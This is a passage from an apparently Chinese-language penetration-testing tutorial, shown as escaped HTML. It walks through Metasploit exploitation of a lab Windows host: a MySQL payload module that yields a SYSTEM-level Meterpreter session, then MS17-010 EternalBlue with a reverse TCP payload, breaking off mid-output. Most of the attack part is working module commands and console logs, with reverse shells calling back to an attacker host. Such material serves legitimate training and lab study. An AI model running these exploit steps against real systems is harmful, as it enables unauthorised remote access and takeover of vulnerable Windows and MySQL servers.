class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">show<\/span> <span class=\"hljs-string\">options<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/mysql\/mysql_payload)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/mysql\/mysql_payload)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">PAYLOAD<\/span> <span class=\"hljs-string\">windows\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">PAYLOAD<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-string\">windows\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/mysql\/mysql_payload)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/mysql\/mysql_payload)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">LPORT<\/span> <span class=\"hljs-number\">4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">LPORT<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/mysql\/mysql_payload)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">exploit<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Started<\/span> <span class=\"hljs-string\">reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">handler<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:3306<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Checking<\/span> <span class=\"hljs-string\">target<\/span> <span class=\"hljs-string\">architecture...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:3306<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Checking<\/span> <span class=\"hljs-string\">for<\/span> <span class=\"hljs-string\">sys_exec()...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:3306<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">sys_exec()<\/span> <span class=\"hljs-string\">already<\/span> <span class=\"hljs-string\">available,<\/span> <span class=\"hljs-string\">using<\/span> <span class=\"hljs-string\">that<\/span> <span class=\"hljs-string\">(override<\/span> <span class=\"hljs-string\">with<\/span> <span class=\"hljs-string\">FORCE_UDF_UPLOAD).<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:3306<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">progress<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">1.47<\/span><span class=\"hljs-string\">%<\/span> <span class=\"hljs-string\">done<\/span> <span class=\"hljs-string\">(1499\/102246<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:3306<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">progress<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">2.93<\/span><span class=\"hljs-string\">%<\/span> <span class=\"hljs-string\">done<\/span> <span class=\"hljs-string\">(2998\/102246<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:3306<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">progress<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">4.40<\/span><span class=\"hljs-string\">%<\/span> <span class=\"hljs-string\">done<\/span> <span class=\"hljs-string\">(4497\/102246<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:3306<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">progress<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">5.86<\/span><span class=\"hljs-string\">%<\/span> <span class=\"hljs-string\">done<\/span> <span class=\"hljs-string\">(5996\/102246<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">......<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Sending<\/span> <span class=\"hljs-string\">stage<\/span> <span class=\"hljs-string\">(179779<\/span> <span class=\"hljs-string\">bytes)<\/span> <span class=\"hljs-string\">to<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:3306<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">progress<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">100.00<\/span><span class=\"hljs-string\">%<\/span> <span class=\"hljs-string\">done<\/span> <span class=\"hljs-string\">(102246\/102246<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Meterpreter<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-number\">1<\/span> <span class=\"hljs-string\">opened<\/span> <span class=\"hljs-string\">(192.168.177.143:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:55358)<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">2019-04-26 16:25:45<\/span> <span class=\"hljs-string\">+0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">getuid<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Server username:<\/span> <span class=\"hljs-string\">NT<\/span> <span class=\"hljs-string\">AUTHORITY\\SYSTEM<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>\u5982\u679c\u76ee\u6807<code>Mysql<\/code>\u6ca1\u6709\u8bbe\u7f6e<code>root<\/code>\u5bc6\u7801\uff0c\u56e0\u6b64\u53ef\u4ee5\u4f7f\u7528\u00a0<code>MySQL<\/code>\u670d\u52a1\u4e0a\u4f20<code>shell<\/code>\u5e76\u83b7\u5f97\u7cfb\u7edf\u7684\u8fdc\u7a0b\u8bbf\u95ee\u6743\u9650\u3002\u5c31\u50cf\u4e0a\u9762\u4e00\u6837\u3002\u6240\u4ee5\uff0c\u6c38\u8fdc\u4e0d\u8981\u5fd8\u8bb0\u5bf9\u57fa\u7840\u670d\u52a1\u8fdb\u884c\u6e17\u900f\u6d4b\u8bd5\u3002\u5373\u4fbf\u4f60\u8ba4\u4e3a\u4e0d\u4f1a\u6709\u4eba\u50bb\u5230\u914d\u7f6e\u65e0\u5bc6\u7801\u7684\u670d\u52a1\u3002<\/p>\n<h4 class=\"heading\">6\u3001MS17-010 \u6c38\u6052\u4e4b\u84dd SMB\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cWindows\u5185\u6838\u7834\u574f<\/h4>\n<p>\u518d\u6b21\u5229\u7528\u5728\u4fe1\u606f\u6536\u96c6\u548c\u626b\u63cf\u9636\u6bb5\u6536\u96c6\u7684\u4fe1\u606f\uff0c\u7279\u522b\u662f<code>MS17-010 SMB RCE<\/code>\u68c0\u6d4b\u8f85\u52a9\u6a21\u5757\u7684\u8f93\u51fa\u4fe1\u606f\uff0c\u6211\u4eec\u53ef\u4ee5\u8f6c\u5411\u4e0b\u4e00\u4e2a\u6613\u53d7\u653b\u51fb\u7684\u670d\u52a1\u3002<\/p>\n<h5 class=\"heading\">\u51c6\u5907\u5de5\u4f5c<\/h5>\n<p><code>MS17-010 EthernalBlue SMB Remote Windows Kernel Pool Corruption<\/code>\u653b\u51fb\u6a21\u5757\u662f<code>Equation Group ETERNALBLUE<\/code>\u7684\u4e00\u90e8\u5206\u3002<code>Equation Group ETERNALBLUE<\/code>\u662f<code>FuzzBunch toolkit<\/code>\u7684\u4e00\u90e8\u5206\u3002\u7531<code>Shadow Brokrs<\/code>\u4ece\u7f8e\u56fd\u56fd\u5bb6\u5b89\u5168\u5c40\uff08NSA\uff09\u83b7\u53d6\u5e76\u516c\u5f00\u3002<code>ETERNALBLUE<\/code>\u901a\u5e38\u88ab\u8ba4\u4e3a\u662f\u7531<code>NSA<\/code>\u5f00\u53d1\u3002\u5b83\u5229\u7528<code>srv.sys<\/code>\u5728\u5904\u7406<code>SrvOs2FeaListSizeToNt<\/code>\u7684\u65f6\u5019\u903b\u8f91\u4e0d\u6b63\u786e\u5bfc\u81f4\u8d8a\u754c\u62f7\u8d1d\u4ece\u800c\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u8fdb\u800c\u5141\u8bb8\u6211\u4eec\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\u5b83\u5728\u88ab\u516c\u5f00\u540e\u88ab\u7528\u5728<code>WannaCry<\/code>\u52d2\u7d22\u8f6f\u4ef6\u4e2d\u8fdb\u884c\u653b\u51fb\u3002\u6b64\u6f0f\u6d1e\u4f1a\u5f71\u54cd\u6240\u6709\u8fd0\u884c<code>SMBv1<\/code>\u670d\u52a1\u4e14\u672a\u66f4\u65b0<code>SMB<\/code>\u5b89\u5168\u8865\u4e01\u7684<code>Windows<\/code>\u8ba1\u7b97\u673a\u548c<code>Windows<\/code>\u670d\u52a1\u5668\u3002<\/p>\n<h5 class=\"heading\">\u600e\u4e48\u505a<\/h5>\n<p>\u8f7d\u5165<code>ms17_010_eternalblue<\/code>\u6a21\u5757\uff0c\u8bbe\u7f6e\u76ee\u6807<code>IP<\/code>\u5730\u5740\uff0c\u8bbe\u7f6e<code>Payload<\/code>\uff0c\u7136\u540e\u6267\u884c\u653b\u51fb<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/smb\/ms17_010_eternalblue)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/smb\/ms17_010_eternalblue)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">PAYLOAD<\/span> <span class=\"hljs-string\">windows\/x64\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">PAYLOAD<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-string\">windows\/x64\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/smb\/ms17_010_eternalblue)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">LHOST<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/smb\/ms17_010_eternalblue)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">LPORT<\/span> <span class=\"hljs-number\">4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/smb\/ms17_010_eternalblue)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">exploit<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Started<\/span> <span class=\"hljs-string\">reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">handler<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span><span class=\"hljs-string\">:4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Connecting<\/span> <span class=\"hljs-string\">to<\/span> <span class=\"hljs-string\">target<\/span> <span class=\"hljs-string\">for<\/span> <span class=\"hljs-string\">exploitation.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Connection<\/span> <span class=\"hljs-string\">established<\/span> <span class=\"hljs-string\">for<\/span> <span class=\"hljs-string\">exploitation.<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">+<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">Target<\/span> <span class=\"hljs-string\">OS<\/span> <span class=\"hljs-string\">selected<\/span> <span class=\"hljs-string\">valid<\/span> <span class=\"hljs-string\">for<\/span> <span class=\"hljs-string\">OS<\/span> <span class=\"hljs-string\">indicated<\/span> <span class=\"hljs-string\">by<\/span> <span class=\"hljs-string\">SMB<\/span> <span class=\"hljs-string\">reply<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">CORE<\/span> <span class=\"hljs-string\">raw<\/span> <span class=\"hljs-string\">buffer<\/span> <span class=\"hljs-string\">dump<\/span> <span class=\"hljs-string\">(51<\/span> <span class=\"hljs-string\">bytes)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">0x00000000<\/span> <span class=\"hljs-number\">57<\/span> <span class=\"hljs-number\">69<\/span> <span class=\"hljs-string\">6e<\/span> <span class=\"hljs-number\">64<\/span> <span class=\"hljs-string\">6f<\/span> <span class=\"hljs-number\">77<\/span> <span class=\"hljs-number\">73<\/span> <span class=\"hljs-number\">20<\/span> <span class=\"hljs-number\">53<\/span> <span class=\"hljs-number\">65<\/span> <span class=\"hljs-number\">72<\/span> <span class=\"hljs-number\">76<\/span> <span class=\"hljs-number\">65<\/span> <span class=\"hljs-number\">72<\/span> <span class=\"hljs-number\">20<\/span> <span class=\"hljs-number\">32<\/span> <span class=\"hljs-string\">Windows<\/span> <span class=\"hljs-string\">Server<\/span> <span class=\"hljs-number\">2<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:445<\/span> <span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-number\">0x00000010<\/span> <span class=\"hljs-number\">30<\/span> <span class=\"hljs-number\">30<\/span> <span class=\"hljs-number\">38<\/span> <span class=\"hljs-number\">20<\/span> <span class=\"hljs-number\">52<\/span> <span class=\"hljs-number\">32<\/span> <span class=\"hljs-number\">20<\/span> <span class=\"hljs-number\">53<\/span> <span class=\"hljs-number\">74<\/span> <span class=\"hljs-number\">61<\/span> <span class=\"hljs-string\">6e<\/span> <span class=\"hljs-number\">64<\/span> <span class=\"hljs-number\">61<\/span> <span class=\"hljs-number\">72<\/span> <span class=\"hljs-number\">64<\/span> <span 